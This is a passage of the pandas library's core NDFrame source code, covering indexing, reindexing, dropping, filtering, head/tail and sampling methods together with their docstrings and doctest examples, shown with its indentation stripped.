... 'class': ['mammal', 'mammal', 'mammal', 'bird'],
... 'animal': ['cat', 'dog', 'bat', 'penguin'],
... 'locomotion': ['walks', 'walks', 'flies', 'walks']}
>>> df = pd.DataFrame(data=d)
>>> df = df.set_index(['class', 'animal', 'locomotion'])
>>> df
num_legs num_wings
class animal locomotion
mammal cat walks 4 0
dog walks 4 0
bat flies 2 2
bird penguin walks 2 2
Get values at specified index
>>> df.xs('mammal')
num_legs num_wings
animal locomotion
cat walks 4 0
dog walks 4 0
bat flies 2 2
Get values at several indexes
>>> df.xs(('mammal', 'dog'))
num_legs num_wings
locomotion
walks 4 0
Get values at specified index and level
>>> df.xs('cat', level=1)
num_legs num_wings
class locomotion
mammal walks 4 0
Get values at several indexes and levels
>>> df.xs(('bird', 'walks'),
... level=[0, 'locomotion'])
num_legs num_wings
animal
penguin 2 2
Get values at specified column and axis
>>> df.xs('num_wings', axis=1)
class animal locomotion
mammal cat walks 0
dog walks 0
bat flies 2
bird penguin walks 2
Name: num_wings, dtype: int64
"""
axis = self._get_axis_number(axis)
labels = self._get_axis(axis)
if level is not None:
loc, new_ax = labels.get_loc_level(key, level=level, drop_level=drop_level)
# create the tuple of the indexer
_indexer = [slice(None)] * self.ndim
_indexer[axis] = loc
indexer = tuple(_indexer)
result = self.iloc[indexer]
setattr(result, result._get_axis_name(axis), new_ax)
return result
if axis == 1:
return self[key]
self._consolidate_inplace()
index = self.index
if isinstance(index, MultiIndex):
loc, new_index = self.index.get_loc_level(key, drop_level=drop_level)
else:
loc = self.index.get_loc(key)
if isinstance(loc, np.ndarray):
if loc.dtype == np.bool_:
(inds,) = loc.nonzero()
return self._take_with_is_copy(inds, axis=axis)
else:
return self._take_with_is_copy(loc, axis=axis)
if not is_scalar(loc):
new_index = self.index[loc]
if is_scalar(loc):
# In this case loc should be an integer
if self.ndim == 1:
# if we encounter an array-like and we only have 1 dim
# that means that their are list/ndarrays inside the Series!
# so just return them (GH 6394)
return self._values[loc]
new_values = self._data.fast_xs(loc)
result = self._constructor_sliced(
new_values,
index=self.columns,
name=self.index[loc],
dtype=new_values.dtype,
)
else:
result = self.iloc[loc]
result.index = new_index
# this could be a view
# but only in a single-dtyped view sliceable case
result._set_is_copy(self, copy=not result._is_view)
return result
_xs: Callable = xs
def __getitem__(self, item):
raise AbstractMethodError(self)
def _get_item_cache(self, item):
"""Return the cached item, item represents a label indexer."""
cache = self._item_cache
res = cache.get(item)
if res is None:
values = self._data.get(item)
res = self._box_item_values(item, values)
cache[item] = res
res._set_as_cached(item, self)
# for a chain
res._is_copy = self._is_copy
return res
def _box_item_values(self, key, values):
raise AbstractMethodError(self)
def _slice(self: FrameOrSeries, slobj: slice, axis=0) -> FrameOrSeries:
"""
Construct a slice of this container.
Slicing with this method is *always* positional.
"""
assert isinstance(slobj, slice), type(slobj)
axis = self._get_block_manager_axis(axis)
result = self._constructor(self._data.get_slice(slobj, axis=axis))
result = result.__finalize__(self)
# this could be a view
# but only in a single-dtyped view sliceable case
is_copy = axis != 0 or result._is_view
result._set_is_copy(self, copy=is_copy)
return result
def _set_item(self, key, value) -> None:
self._data.set(key, value)
self._clear_item_cache()
def _set_is_copy(self, ref, copy: bool_t = True) -> None:
if not copy:
self._is_copy = None
else:
assert ref is not None
self._is_copy = weakref.ref(ref)
def _check_is_chained_assignment_possible(self) -> bool_t:
"""
Check if we are a view, have a cacher, and are of mixed type.
If so, then force a setitem_copy check.
Should be called just near setting a value
Will return a boolean if it we are a view and are cached, but a
single-dtype meaning that the cacher should be updated following
setting.
"""
if self._is_view and self._is_cached:
ref = self._get_cacher()
if ref is not None and ref._is_mixed_type:
self._check_setitem_copy(stacklevel=4, t="referant", force=True)
return True
elif self._is_copy:
self._check_setitem_copy(stacklevel=4, t="referant")
return False
def _check_setitem_copy(self, stacklevel=4, t="setting", force=False):
"""
Parameters
----------
stacklevel : int, default 4
the level to show of the stack when the error is output
t : str, the type of setting error
force : bool, default False
If True, then force showing an error.
validate if we are doing a setitem on a chained copy.
If you call this function, be sure to set the stacklevel such that the
user will see the error *at the level of setting*
It is technically possible to figure out that we are setting on
a copy even WITH a multi-dtyped pandas object. In other words, some
blocks may be views while other are not. Currently _is_view will ALWAYS
return False for multi-blocks to avoid having to handle this case.
df = DataFrame(np.arange(0,9), columns=['count'])
df['group'] = 'b'
# This technically need not raise SettingWithCopy if both are view
# (which is not # generally guaranteed but is usually True. However,
# this is in general not a good practice and we recommend using .loc.
df.iloc[0:5]['group'] = 'a'
"""
# return early if the check is not needed
if not (force or self._is_copy):
return
value = config.get_option("mode.chained_assignment")
if value is None:
return
# see if the copy is not actually referred; if so, then dissolve
# the copy weakref
if self._is_copy is not None and not isinstance(self._is_copy, str):
r = self._is_copy()
if not gc.get_referents(r) or r.shape == self.shape:
self._is_copy = None
return
# a custom message
if isinstance(self._is_copy, str):
t = self._is_copy
elif t == "referant":
t = (
"\n"
"A value is trying to be set on a copy of a slice from a "
"DataFrame\n\n"
"See the caveats in the documentation: "
"https://pandas.pydata.org/pandas-docs/stable/user_guide/"
"indexing.html#returning-a-view-versus-a-copy"
)
else:
t = (
"\n"
"A value is trying to be set on a copy of a slice from a "
"DataFrame.\n"
"Try using .loc[row_indexer,col_indexer] = value "
"instead\n\nSee the caveats in the documentation: "
"https://pandas.pydata.org/pandas-docs/stable/user_guide/"
"indexing.html#returning-a-view-versus-a-copy"
)
if value == "raise":
raise com.SettingWithCopyError(t)
elif value == "warn":
warnings.warn(t, com.SettingWithCopyWarning, stacklevel=stacklevel)
def __delitem__(self, key) -> None:
"""
Delete item
"""
deleted = False
maybe_shortcut = False
if self.ndim == 2 and isinstance(self.columns, MultiIndex):
try:
maybe_shortcut = key not in self.columns._engine
except TypeError:
pass
if maybe_shortcut:
# Allow shorthand to delete all columns whose first len(key)
# elements match key:
if not isinstance(key, tuple):
key = (key,)
for col in self.columns:
if isinstance(col, tuple) and col[: len(key)] == key:
del self[col]
deleted = True
if not deleted:
# If the above loop ran and didn't delete anything because
# there was no match, this call should raise the appropriate
# exception:
self._data.delete(key)
# delete from the caches
try:
del self._item_cache[key]
except KeyError:
pass
# ----------------------------------------------------------------------
# Unsorted
def get(self, key, default=None):
"""
Get item from object for given key (ex: DataFrame column).
Returns default value if not found.
Parameters
----------
key : object
Returns
-------
value : same type as items contained in object
"""
try:
return self[key]
except (KeyError, ValueError, IndexError):
return default
@property
def _is_view(self) -> bool_t:
"""Return boolean indicating if self is view of another array """
return self._data.is_view
def reindex_like(
self: FrameOrSeries,
other,
method: Optional[str] = None,
copy: bool_t = True,
limit=None,
tolerance=None,
) -> FrameOrSeries:
"""
Return an object with matching indices as other object.
Conform the object to the same index on all axes. Optional
filling logic, placing NaN in locations having no value
in the previous index. A new object is produced unless the
new index is equivalent to the current one and copy=False.
Parameters
----------
other : Object of the same data type
Its row and column indices are used to define the new indices
of this object.
method : {None, 'backfill'/'bfill', 'pad'/'ffill', 'nearest'}
Method to use for filling holes in reindexed DataFrame.
Please note: this is only applicable to DataFrames/Series with a
monotonically increasing/decreasing index.
* None (default): don't fill gaps
* pad / ffill: propagate last valid observation forward to next
valid
* backfill / bfill: use next valid observation to fill gap
* nearest: use nearest valid observations to fill gap.
copy : bool, default True
Return a new object, even if the passed indexes are the same.
limit : int, default None
Maximum number of consecutive labels to fill for inexact matches.
tolerance : optional
Maximum distance between original and new labels for inexact
matches. The values of the index at the matching locations most
satisfy the equation ``abs(index[indexer] - target) <= tolerance``.
Tolerance may be a scalar value, which applies the same tolerance
to all values, or list-like, which applies variable tolerance per
element. List-like includes list, tuple, array, Series, and must be
the same size as the index and its dtype must exactly match the
index's type.
.. versionadded:: 0.21.0 (list-like tolerance)
Returns
-------
Series or DataFrame
Same type as caller, but with changed indices on each axis.
See Also
--------
DataFrame.set_index : Set row labels.
DataFrame.reset_index : Remove row labels or move them to new columns.
DataFrame.reindex : Change to new indices or expand indices.
Notes
-----
Same as calling
``.reindex(index=other.index, columns=other.columns,...)``.
Examples
--------
>>> df1 = pd.DataFrame([[24.3, 75.7, 'high'],
... [31, 87.8, 'high'],
... [22, 71.6, 'medium'],
... [35, 95, 'medium']],
... columns=['temp_celsius', 'temp_fahrenheit',
... 'windspeed'],
... index=pd.date_range(start='2014-02-12',
... end='2014-02-15', freq='D'))
>>> df1
temp_celsius temp_fahrenheit windspeed
2014-02-12 24.3 75.7 high
2014-02-13 31.0 87.8 high
2014-02-14 22.0 71.6 medium
2014-02-15 35.0 95.0 medium
>>> df2 = pd.DataFrame([[28, 'low'],
... [30, 'low'],
... [35.1, 'medium']],
... columns=['temp_celsius', 'windspeed'],
... index=pd.DatetimeIndex(['2014-02-12', '2014-02-13',
... '2014-02-15']))
>>> df2
temp_celsius windspeed
2014-02-12 28.0 low
2014-02-13 30.0 low
2014-02-15 35.1 medium
>>> df2.reindex_like(df1)
temp_celsius temp_fahrenheit windspeed
2014-02-12 28.0 NaN low
2014-02-13 30.0 NaN low
2014-02-14 NaN NaN NaN
2014-02-15 35.1 NaN medium
"""
d = other._construct_axes_dict(
axes=self._AXIS_ORDERS,
method=method,
copy=copy,
limit=limit,
tolerance=tolerance,
)
return self.reindex(**d)
def drop(
self,
labels=None,
axis=0,
index=None,
columns=None,
level=None,
inplace: bool_t = False,
errors: str = "raise",
):
inplace = validate_bool_kwarg(inplace, "inplace")
if labels is not None:
if index is not None or columns is not None:
raise ValueError("Cannot specify both 'labels' and 'index'/'columns'")
axis_name = self._get_axis_name(axis)
axes = {axis_name: labels}
elif index is not None or columns is not None:
axes, _ = self._construct_axes_from_arguments((index, columns), {})
else:
raise ValueError(
"Need to specify at least one of 'labels', 'index' or 'columns'"
)
obj = self
for axis, labels in axes.items():
if labels is not None:
obj = obj._drop_axis(labels, axis, level=level, errors=errors)
if inplace:
self._update_inplace(obj)
else:
return obj
def _drop_axis(
self: FrameOrSeries, labels, axis, level=None, errors: str = "raise"
) -> FrameOrSeries:
"""
Drop labels from specified axis. Used in the ``drop`` method
internally.
Parameters
----------
labels : single label or list-like
axis : int or axis name
level : int or level name, default None
For MultiIndex
errors : {'ignore', 'raise'}, default 'raise'
If 'ignore', suppress error and existing labels are dropped.
"""
axis = self._get_axis_number(axis)
axis_name = self._get_axis_name(axis)
axis = self._get_axis(axis)
if axis.is_unique:
if level is not None:
if not isinstance(axis, MultiIndex):
raise AssertionError("axis must be a MultiIndex")
new_axis = axis.drop(labels, level=level, errors=errors)
else:
new_axis = axis.drop(labels, errors=errors)
result = self.reindex(**{axis_name: new_axis})
# Case for non-unique axis
else:
labels = ensure_object(com.index_labels_to_array(labels))
if level is not None:
if not isinstance(axis, MultiIndex):
raise AssertionError("axis must be a MultiIndex")
indexer = ~axis.get_level_values(level).isin(labels)
# GH 18561 MultiIndex.drop should raise if label is absent
if errors == "raise" and indexer.all():
raise KeyError(f"{labels} not found in axis")
else:
indexer = ~axis.isin(labels)
# Check if label doesn't exist along axis
labels_missing = (axis.get_indexer_for(labels) == -1).any()
if errors == "raise" and labels_missing:
raise KeyError(f"{labels} not found in axis")
slicer = [slice(None)] * self.ndim
slicer[self._get_axis_number(axis_name)] = indexer
result = self.loc[tuple(slicer)]
return result
def _update_inplace(self, result, verify_is_copy: bool_t = True) -> None:
"""
Replace self internals with result.
Parameters
----------
verify_is_copy : bool, default True
Provide is_copy checks.
"""
# NOTE: This does *not* call __finalize__ and that's an explicit
# decision that we may revisit in the future.
self._reset_cache()
self._clear_item_cache()
self._data = getattr(result, "_data", result)
self._maybe_update_cacher(verify_is_copy=verify_is_copy)
def add_prefix(self: FrameOrSeries, prefix: str) -> FrameOrSeries:
"""
Prefix labels with string `prefix`.
For Series, the row labels are prefixed.
For DataFrame, the column labels are prefixed.
Parameters
----------
prefix : str
The string to add before each label.
Returns
-------
Series or DataFrame
New Series or DataFrame with updated labels.
See Also
--------
Series.add_suffix: Suffix row labels with string `suffix`.
DataFrame.add_suffix: Suffix column labels with string `suffix`.
Examples
--------
>>> s = pd.Series([1, 2, 3, 4])
>>> s
0 1
1 2
2 3
3 4
dtype: int64
>>> s.add_prefix('item_')
item_0 1
item_1 2
item_2 3
item_3 4
dtype: int64
>>> df = pd.DataFrame({'A': [1, 2, 3, 4], 'B': [3, 4, 5, 6]})
>>> df
A B
0 1 3
1 2 4
2 3 5
3 4 6
>>> df.add_prefix('col_')
col_A col_B
0 1 3
1 2 4
2 3 5
3 4 6
"""
f = functools.partial("{prefix}{}".format, prefix=prefix)
mapper = {self._info_axis_name: f}
return self.rename(**mapper) # type: ignore
def add_suffix(self: FrameOrSeries, suffix: str) -> FrameOrSeries:
"""
Suffix labels with string `suffix`.
For Series, the row labels are suffixed.
For DataFrame, the column labels are suffixed.
Parameters
----------
suffix : str
The string to add after each label.
Returns
-------
Series or DataFrame
New Series or DataFrame with updated labels.
See Also
--------
Series.add_prefix: Prefix row labels with string `prefix`.
DataFrame.add_prefix: Prefix column labels with string `prefix`.
Examples
--------
>>> s = pd.Series([1, 2, 3, 4])
>>> s
0 1
1 2
2 3
3 4
dtype: int64
>>> s.add_suffix('_item')
0_item 1
1_item 2
2_item 3
3_item 4
dtype: int64
>>> df = pd.DataFrame({'A': [1, 2, 3, 4], 'B': [3, 4, 5, 6]})
>>> df
A B
0 1 3
1 2 4
2 3 5
3 4 6
>>> df.add_suffix('_col')
A_col B_col
0 1 3
1 2 4
2 3 5
3 4 6
"""
f = functools.partial("{}{suffix}".format, suffix=suffix)
mapper = {self._info_axis_name: f}
return self.rename(**mapper) # type: ignore
def sort_values(
self,
axis=0,
ascending=True,
inplace: bool_t = False,
kind: str = "quicksort",
na_position: str = "last",
ignore_index: bool_t = False,
):
"""
Sort by the values along either axis.
Parameters
----------%(optional_by)s
axis : %(axes_single_arg)s, default 0
Axis to be sorted.
ascending : bool or list of bool, default True
Sort ascending vs. descending. Specify list for multiple sort
orders. If this is a list of bools, must match the length of
the by.
inplace : bool, default False
If True, perform operation in-place.
kind : {'quicksort', 'mergesort', 'heapsort'}, default 'quicksort'
Choice of sorting algorithm. See also ndarray.np.sort for more
information. `mergesort` is the only stable algorithm. For
DataFrames, this option is only applied when sorting on a single
column or label.
na_position : {'first', 'last'}, default 'last'
Puts NaNs at the beginning if `first`; `last` puts NaNs at the
end.
ignore_index : bool, default False
If True, the resulting axis will be labeled 0, 1, …, n - 1.
.. versionadded:: 1.0.0
Returns
-------
sorted_obj : DataFrame or None
DataFrame with sorted values if inplace=False, None otherwise.
Examples
--------
>>> df = pd.DataFrame({
... 'col1': ['A', 'A', 'B', np.nan, 'D', 'C'],
... 'col2': [2, 1, 9, 8, 7, 4],
... 'col3': [0, 1, 9, 4, 2, 3],
... })
>>> df
col1 col2 col3
0 A 2 0
1 A 1 1
2 B 9 9
3 NaN 8 4
4 D 7 2
5 C 4 3
Sort by col1
>>> df.sort_values(by=['col1'])
col1 col2 col3
0 A 2 0
1 A 1 1
2 B 9 9
5 C 4 3
4 D 7 2
3 NaN 8 4
Sort by multiple columns
>>> df.sort_values(by=['col1', 'col2'])
col1 col2 col3
1 A 1 1
0 A 2 0
2 B 9 9
5 C 4 3
4 D 7 2
3 NaN 8 4
Sort Descending
>>> df.sort_values(by='col1', ascending=False)
col1 col2 col3
4 D 7 2
5 C 4 3
2 B 9 9
0 A 2 0
1 A 1 1
3 NaN 8 4
Putting NAs first
>>> df.sort_values(by='col1', ascending=False, na_position='first')
col1 col2 col3
3 NaN 8 4
4 D 7 2
5 C 4 3
2 B 9 9
0 A 2 0
1 A 1 1
"""
raise AbstractMethodError(self)
def reindex(self: FrameOrSeries, *args, **kwargs) -> FrameOrSeries:
"""
Conform %(klass)s to new index with optional filling logic.
Places NA/NaN in locations having no value in the previous index. A new object
is produced unless the new index is equivalent to the current one and
``copy=False``.
Parameters
----------
%(optional_labels)s
%(axes)s : array-like, optional
New labels / index to conform to, should be specified using
keywords. Preferably an Index object to avoid duplicating data.
%(optional_axis)s
method : {None, 'backfill'/'bfill', 'pad'/'ffill', 'nearest'}
Method to use for filling holes in reindexed DataFrame.
Please note: this is only applicable to DataFrames/Series with a
monotonically increasing/decreasing index.
* None (default): don't fill gaps
* pad / ffill: Propagate last valid observation forward to next
valid.
* backfill / bfill: Use next valid observation to fill gap.
* nearest: Use nearest valid observations to fill gap.
copy : bool, default True
Return a new object, even if the passed indexes are the same.
level : int or name
Broadcast across a level, matching Index values on the
passed MultiIndex level.
fill_value : scalar, default np.NaN
Value to use for missing values. Defaults to NaN, but can be any
"compatible" value.
limit : int, default None
Maximum number of consecutive elements to forward or backward fill.
tolerance : optional
Maximum distance between original and new labels for inexact
matches. The values of the index at the matching locations most
satisfy the equation ``abs(index[indexer] - target) <= tolerance``.
Tolerance may be a scalar value, which applies the same tolerance
to all values, or list-like, which applies variable tolerance per
element. List-like includes list, tuple, array, Series, and must be
the same size as the index and its dtype must exactly match the
index's type.
.. versionadded:: 0.21.0 (list-like tolerance)
Returns
-------
%(klass)s with changed index.
See Also
--------
DataFrame.set_index : Set row labels.
DataFrame.reset_index : Remove row labels or move them to new columns.
DataFrame.reindex_like : Change to same indices as other DataFrame.
Examples
--------
``DataFrame.reindex`` supports two calling conventions
* ``(index=index_labels, columns=column_labels, ...)``
* ``(labels, axis={'index', 'columns'}, ...)``
We *highly* recommend using keyword arguments to clarify your
intent.
Create a dataframe with some fictional data.
>>> index = ['Firefox', 'Chrome', 'Safari', 'IE10', 'Konqueror']
>>> df = pd.DataFrame({'http_status': [200, 200, 404, 404, 301],
... 'response_time': [0.04, 0.02, 0.07, 0.08, 1.0]},
... index=index)
>>> df
http_status response_time
Firefox 200 0.04
Chrome 200 0.02
Safari 404 0.07
IE10 404 0.08
Konqueror 301 1.00
Create a new index and reindex the dataframe. By default
values in the new index that do not have corresponding
records in the dataframe are assigned ``NaN``.
>>> new_index = ['Safari', 'Iceweasel', 'Comodo Dragon', 'IE10',
... 'Chrome']
>>> df.reindex(new_index)
http_status response_time
Safari 404.0 0.07
Iceweasel NaN NaN
Comodo Dragon NaN NaN
IE10 404.0 0.08
Chrome 200.0 0.02
We can fill in the missing values by passing a value to
the keyword ``fill_value``. Because the index is not monotonically
increasing or decreasing, we cannot use arguments to the keyword
``method`` to fill the ``NaN`` values.
>>> df.reindex(new_index, fill_value=0)
http_status response_time
Safari 404 0.07
Iceweasel 0 0.00
Comodo Dragon 0 0.00
IE10 404 0.08
Chrome 200 0.02
>>> df.reindex(new_index, fill_value='missing')
http_status response_time
Safari 404 0.07
Iceweasel missing missing
Comodo Dragon missing missing
IE10 404 0.08
Chrome 200 0.02
We can also reindex the columns.
>>> df.reindex(columns=['http_status', 'user_agent'])
http_status user_agent
Firefox 200 NaN
Chrome 200 NaN
Safari 404 NaN
IE10 404 NaN
Konqueror 301 NaN
Or we can use "axis-style" keyword arguments
>>> df.reindex(['http_status', 'user_agent'], axis="columns")
http_status user_agent
Firefox 200 NaN
Chrome 200 NaN
Safari 404 NaN
IE10 404 NaN
Konqueror 301 NaN
To further illustrate the filling functionality in
``reindex``, we will create a dataframe with a
monotonically increasing index (for example, a sequence
of dates).
>>> date_index = pd.date_range('1/1/2010', periods=6, freq='D')
>>> df2 = pd.DataFrame({"prices": [100, 101, np.nan, 100, 89, 88]},
... index=date_index)
>>> df2
prices
2010-01-01 100.0
2010-01-02 101.0
2010-01-03 NaN
2010-01-04 100.0
2010-01-05 89.0
2010-01-06 88.0
Suppose we decide to expand the dataframe to cover a wider
date range.
>>> date_index2 = pd.date_range('12/29/2009', periods=10, freq='D')
>>> df2.reindex(date_index2)
prices
2009-12-29 NaN
2009-12-30 NaN
2009-12-31 NaN
2010-01-01 100.0
2010-01-02 101.0
2010-01-03 NaN
2010-01-04 100.0
2010-01-05 89.0
2010-01-06 88.0
2010-01-07 NaN
The index entries that did not have a value in the original data frame
(for example, '2009-12-29') are by default filled with ``NaN``.
If desired, we can fill in the missing values using one of several
options.
For example, to back-propagate the last valid value to fill the ``NaN``
values, pass ``bfill`` as an argument to the ``method`` keyword.
>>> df2.reindex(date_index2, method='bfill')
prices
2009-12-29 100.0
2009-12-30 100.0
2009-12-31 100.0
2010-01-01 100.0
2010-01-02 101.0
2010-01-03 NaN
2010-01-04 100.0
2010-01-05 89.0
2010-01-06 88.0
2010-01-07 NaN
Please note that the ``NaN`` value present in the original dataframe
(at index value 2010-01-03) will not be filled by any of the
value propagation schemes. This is because filling while reindexing
does not look at dataframe values, but only compares the original and
desired indexes. If you do want to fill in the ``NaN`` values present
in the original dataframe, use the ``fillna()`` method.
See the :ref:`user guide <basics.reindexing>` for more.
"""
# TODO: Decide if we care about having different examples for different
# kinds
# construct the args
axes, kwargs = self._construct_axes_from_arguments(args, kwargs)
method = missing.clean_reindex_fill_method(kwargs.pop("method", None))
level = kwargs.pop("level", None)
copy = kwargs.pop("copy", True)
limit = kwargs.pop("limit", None)
tolerance = kwargs.pop("tolerance", None)
fill_value = kwargs.pop("fill_value", None)
# Series.reindex doesn't use / need the axis kwarg
# We pop and ignore it here, to make writing Series/Frame generic code
# easier
kwargs.pop("axis", None)
if kwargs:
raise TypeError(
"reindex() got an unexpected keyword "
f'argument "{list(kwargs.keys())[0]}"'
)
self._consolidate_inplace()
# if all axes that are requested to reindex are equal, then only copy
# if indicated must have index names equal here as well as values
if all(
self._get_axis(axis).identical(ax)
for axis, ax in axes.items()
if ax is not None
):
if copy:
return self.copy()
return self
# check if we are a multi reindex
if self._needs_reindex_multi(axes, method, level):
return self._reindex_multi(axes, copy, fill_value)
# perform the reindex on the axes
return self._reindex_axes(
axes, level, limit, tolerance, method, fill_value, copy
).__finalize__(self)
def _reindex_axes(
self: FrameOrSeries, axes, level, limit, tolerance, method, fill_value, copy
) -> FrameOrSeries:
"""Perform the reindex for all the axes."""
obj = self
for a in self._AXIS_ORDERS:
labels = axes[a]
if labels is None:
continue
ax = self._get_axis(a)
new_index, indexer = ax.reindex(
labels, level=level, limit=limit, tolerance=tolerance, method=method
)
axis = self._get_axis_number(a)
obj = obj._reindex_with_indexers(
{axis: [new_index, indexer]},
fill_value=fill_value,
copy=copy,
allow_dups=False,
)
return obj
def _needs_reindex_multi(self, axes, method, level) -> bool_t:
"""Check if we do need a multi reindex."""
return (
(com.count_not_none(*axes.values()) == self._AXIS_LEN)
and method is None
and level is None
and not self._is_mixed_type
)
def _reindex_multi(self, axes, copy, fill_value):
raise AbstractMethodError(self)
def _reindex_with_indexers(
self: FrameOrSeries,
reindexers,
fill_value=None,
copy: bool_t = False,
allow_dups: bool_t = False,
) -> FrameOrSeries:
"""allow_dups indicates an internal call here """
# reindex doing multiple operations on different axes if indicated
new_data = self._data
for axis in sorted(reindexers.keys()):
index, indexer = reindexers[axis]
baxis = self._get_block_manager_axis(axis)
if index is None:
continue
index = ensure_index(index)
if indexer is not None:
indexer = ensure_int64(indexer)
# TODO: speed up on homogeneous DataFrame objects
new_data = new_data.reindex_indexer(
index,
indexer,
axis=baxis,
fill_value=fill_value,
allow_dups=allow_dups,
copy=copy,
)
if copy and new_data is self._data:
new_data = new_data.copy()
return self._constructor(new_data).__finalize__(self)
def filter(
self: FrameOrSeries,
items=None,
like: Optional[str] = None,
regex: Optional[str] = None,
axis=None,
) -> FrameOrSeries:
"""
Subset the dataframe rows or columns according to the specified index labels.
Note that this routine does not filter a dataframe on its
contents. The filter is applied to the labels of the index.
Parameters
----------
items : list-like
Keep labels from axis which are in items.
like : str
Keep labels from axis for which "like in label == True".
regex : str (regular expression)
Keep labels from axis for which re.search(regex, label) == True.
axis : {0 or ‘index’, 1 or ‘columns’, None}, default None
The axis to filter on, expressed either as an index (int)
or axis name (str). By default this is the info axis,
'index' for Series, 'columns' for DataFrame.
Returns
-------
same type as input object
See Also
--------
DataFrame.loc : Access a group of rows and columns
by label(s) or a boolean array.
Notes
-----
The ``items``, ``like``, and ``regex`` parameters are
enforced to be mutually exclusive.
``axis`` defaults to the info axis that is used when indexing
with ``[]``.
Examples
--------
>>> df = pd.DataFrame(np.array(([1, 2, 3], [4, 5, 6])),
... index=['mouse', 'rabbit'],
... columns=['one', 'two', 'three'])
>>> # select columns by name
>>> df.filter(items=['one', 'three'])
one three
mouse 1 3
rabbit 4 6
>>> # select columns by regular expression
>>> df.filter(regex='e$', axis=1)
one three
mouse 1 3
rabbit 4 6
>>> # select rows containing 'bbi'
>>> df.filter(like='bbi', axis=0)
one two three
rabbit 4 5 6
"""
nkw = com.count_not_none(items, like, regex)
if nkw > 1:
raise TypeError(
"Keyword arguments `items`, `like`, or `regex` "
"are mutually exclusive"
)
if axis is None:
axis = self._info_axis_name
labels = self._get_axis(axis)
if items is not None:
name = self._get_axis_name(axis)
return self.reindex(**{name: [r for r in items if r in labels]})
elif like:
def f(x):
return like in ensure_str(x)
values = labels.map(f)
return self.loc(axis=axis)[values]
elif regex:
def f(x):
return matcher.search(ensure_str(x)) is not None
matcher = re.compile(regex)
values = labels.map(f)
return self.loc(axis=axis)[values]
else:
raise TypeError("Must pass either `items`, `like`, or `regex`")
def head(self: FrameOrSeries, n: int = 5) -> FrameOrSeries:
"""
Return the first `n` rows.
This function returns the first `n` rows for the object based
on position. It is useful for quickly testing if your object
has the right type of data in it.
For negative values of `n`, this function returns all rows except
the last `n` rows, equivalent to ``df[:-n]``.
Parameters
----------
n : int, default 5
Number of rows to select.
Returns
-------
same type as caller
The first `n` rows of the caller object.
See Also
--------
DataFrame.tail: Returns the last `n` rows.
Examples
--------
>>> df = pd.DataFrame({'animal': ['alligator', 'bee', 'falcon', 'lion',
... 'monkey', 'parrot', 'shark', 'whale', 'zebra']})
>>> df
animal
0 alligator
1 bee
2 falcon
3 lion
4 monkey
5 parrot
6 shark
7 whale
8 zebra
Viewing the first 5 lines
>>> df.head()
animal
0 alligator
1 bee
2 falcon
3 lion
4 monkey
Viewing the first `n` lines (three in this case)
>>> df.head(3)
animal
0 alligator
1 bee
2 falcon
For negative values of `n`
>>> df.head(-3)
animal
0 alligator
1 bee
2 falcon
3 lion
4 monkey
5 parrot
"""
return self.iloc[:n]
def tail(self: FrameOrSeries, n: int = 5) -> FrameOrSeries:
"""
Return the last `n` rows.
This function returns last `n` rows from the object based on
position. It is useful for quickly verifying data, for example,
after sorting or appending rows.
For negative values of `n`, this function returns all rows except
the first `n` rows, equivalent to ``df[n:]``.
Parameters
----------
n : int, default 5
Number of rows to select.
Returns
-------
type of caller
The last `n` rows of the caller object.
See Also
--------
DataFrame.head : The first `n` rows of the caller object.
Examples
--------
>>> df = pd.DataFrame({'animal': ['alligator', 'bee', 'falcon', 'lion',
... 'monkey', 'parrot', 'shark', 'whale', 'zebra']})
>>> df
animal
0 alligator
1 bee
2 falcon
3 lion
4 monkey
5 parrot
6 shark
7 whale
8 zebra
Viewing the last 5 lines
>>> df.tail()
animal
4 monkey
5 parrot
6 shark
7 whale
8 zebra
Viewing the last `n` lines (three in this case)
>>> df.tail(3)
animal
6 shark
7 whale
8 zebra
For negative values of `n`
>>> df.tail(-3)
animal
3 lion
4 monkey
5 parrot
6 shark
7 whale
8 zebra
"""
if n == 0:
return self.iloc[0:0]
return self.iloc[-n:]
def sample(
self: FrameOrSeries,
n=None,
frac=None,
replace=False,
weights=None,
random_state=None,
axis=None,
) -> FrameOrSeries:
"""
Return a random sample of items from an axis of object.
You can use `random_state` for reproducibility.
Parameters
----------
n : int, optional
Number of items from axis to return. Cannot be used with `frac`.
Default = 1 if `frac` = None.
frac : float, optional
Fraction of axis items to return. Cannot be used with `n`.
replace : bool, default False
Allow or disallow sampling of the same row more than once.
weights : str or ndarray-like, optional
Default 'None' results in equal probability weighting.
If passed a Series, will align with target object on index. Index
values in weights not found in sampled object will be ignored and
index values in sampled object not in weights will be assigned
weights of zero.
If called on a DataFrame, will accept the name of a column
when axis = 0.
Unless weights are a Series, weights must be same length as axis
being sampled.
If weights do not sum to 1, they will be normalized to sum to 1.
Missing values in the weights column will be treated as zero.
Infinite values not allowed.
random_state : int or numpy.random.RandomState, optional
Seed for the random number generator (if int), or numpy RandomState
object.
axis : {0 or ‘index’, 1 or ‘columns’, None}, default None
Axis to sample. Accepts axis number or name. Default is stat axis
for given data type (0 for Series and DataFrames).
Returns
-------
Series or DataFrame
A new object of same type as caller containing `n` items randomly
sampled from the caller object.
See Also
--------
numpy.random.choice: Generates a random sample from a given 1-D numpy
array.
Notes
-----
If `frac` > 1, `replacement` should be set to `True`.
Examples
--------
>>> df = pd.DataFrame({'num_legs': [2, 4, 8, 0],
... 'num_wings': [2, 0, 0, 0],
... 'num_specimen_seen': [10, 2, 1, 8]},
... index=['falcon', 'dog', 'spider', 'fish'])
>>> df
num_legs num_wings num_specimen_seen
falcon 2 2 10
dog 4 0 2
spider 8 0 1
fish 0 0 8
Extract 3 random elements from the ``Series`` ``df['num_legs']``:
Note that we use `random_state` to ensure the reproducibility of
the examples.
>>> df['num_legs'].sample(n=3, random_state=1)
fish 0
spider 8
falcon 2
Name: num_legs, dtype: int64
A random 50% sample of the ``DataFrame`` with replacement:
>>> df.sample(frac=0.5, replace=True, random_state=1)
num_legs num_wings num_specimen_seen
dog 4 0 2
fish 0 0 8
An upsample sample of the ``DataFrame`` with replacement:
Note that `replace` parameter has to be `True` for `frac` parameter > 1.
>>> df.sample(frac=2, replace=True, random_state=1)
num_legs num_wings num_specimen_seen
dog 4 0 2
fish 0 0 8
falcon 2 2 10
falcon 2 2 10
fish 0 0 8
dog 4 0 2
fish 0 0 8
dog 4 0 2
Using a DataFrame column as weights. Rows with larger value in the
`num_specimen_seen` column are more likely to be sampled.
>>> df.sample(n=2, weights='num_specimen_seen', random_state=1)
num_legs num_wings num_specimen_seen
falcon 2 2 10
fish 0 0 8
"""
if axis is None:
axis = self._stat_axis_number
